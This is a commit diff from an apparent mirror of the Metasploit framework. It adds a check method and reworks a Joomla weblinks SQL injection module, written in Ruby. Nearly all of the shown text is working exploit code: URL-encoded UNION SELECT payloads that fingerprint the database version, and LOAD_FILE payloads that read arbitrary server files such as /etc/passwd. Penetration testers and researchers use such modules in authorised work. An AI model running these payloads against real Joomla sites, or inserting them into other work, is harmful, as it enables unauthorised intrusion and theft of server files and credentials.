adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

check method

Browse Source
This commit is contained in:
Brandon Perry
2014-03-12 19:47:39 -05:00
parent 9cb1c1a726
commit aa00a5d550
1 changed files with 36 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/auxiliary/gather/joomla_weblinks_sqli.rb
+36 -3
View File
@@ -1,5 +1,5 @@
##
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
@@ -26,6 +26,7 @@ class Metasploit3 < Msf::Auxiliary
],
'References' =>
[
['EDB', '31459']
],
'DisclosureDate' => 'Mar 2 2014'
))
@@ -33,16 +34,44 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/joomla']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
], self.class)
end
def check
payload = datastore['CATEGORYID'].to_s
payload << "0%29%20UNION%20ALL%20SELECT%20CONCAT%280x71636f7471%2CIFNULL%28CAST%28VERSION%28%29%20"
payload << "AS%20CHAR%29%2C0x20%29%2C0x7165776271%29%23"
resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php/weblinks-categories?id=' + payload)
})
if !resp or !resp.body
return Exploit::CheckCode::Safe
end
version = /qcotq(.*)qewbq/.match(resp.body)
if !version
return Exploit::CheckCode::Safe
end
version = version[1].gsub('qcotq', '').gsub('qewbq', '')
print_good("Fingerprinted: #{version}")
return Exploit::CheckCode::Vulnerable
end
def run
file = datastore['FILEPATH'].unpack("H*")[0]
payload = "32%29%20UNION%20ALL%20SELECT%20CONCAT%280x7163756871%2CIFNULL%28CAST%28HEX%28LOAD_FILE%28"
catid = datastore['CATEGORYID']
payload = catid.to_s
payload << "%29%20UNION%20ALL%20SELECT%20CONCAT%280x7163756871%2CIFNULL%28CAST%28HEX%28LOAD_FILE%28"
payload << "0x#{file}%29%29%20AS%20CHAR%29%2C0x20%29%2C0x716f687671%29%23"
resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php/weblinks-categories?id=' + payload)
})
@@ -53,6 +82,10 @@ class Metasploit3 < Msf::Auxiliary
file = /qcuhq(.*)qohvq/.match(resp.body)
if !file
fail_with("Either the file didn't exist or the server has been patched.")
end
file = file[1].gsub('qcuhq', '').gsub('qohvq', '')
file = [file].pack("H*")